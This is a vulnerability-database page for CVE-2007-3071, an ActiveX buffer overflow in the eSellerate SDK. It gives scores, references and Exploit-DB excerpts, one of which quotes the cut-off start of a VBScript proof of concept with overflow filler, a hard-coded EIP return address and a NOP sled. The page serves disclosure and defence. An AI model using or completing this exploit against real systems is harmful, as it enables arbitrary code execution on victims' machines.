CVE-2007-3071
Published 2007-06-06
Priority: P3, 37, critical
CVSS 2.0: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 5.84% (92.3th percentile)
Buffer overflow in the GetWebStoreURL function in a certain ActiveX control in eSellerateControl365.dll 3.6.5.0 in eSellerate SDK allows user-assisted remote attackers to execute arbitrary code via a long first argument.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| digital_river | esellerate_sdk | — | — |
No detection rules found.
Exploit-DB
Tango DropBox 3.1.5 + PRO - Activex HeapSpray
exploitdb·2015-06-19
---
Tango DropBox Activex Heap Spray Exploit
Version: 3.1.5 + PRO
The vulnerability lies in the 'GetWebStoreURL' member method of the COM component used, eSellerateControl350.dll (3.6.5.0).
Vendor Homepage: http://etonica.com/dropbox/index.html
Software Link: http://etonica.com/dropbox/download.html
Author: metacom
Exploit-DB
eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow
exploitdb·2007-06-04
---
source: https://www.securityfocus.com/bid/24300/info
eSellerate SDK ActiveX control is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
This issue affects eSellerate SDK 3.6.5.0; other versions may also be affected.
Sub tryMe()
buff = String(997, "A")
get_EIP = unescape("%6B%AC%3F%7E") '0x7E3FAC6B call EBP from user32.dll
nop = String(24, unesc
No writeups or analysis indexed.
http://osvdb.org/38803
http://www.securityfocus.com/bid/24300
http://www.shinnai.altervista.org/exploits/esellerate.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/35003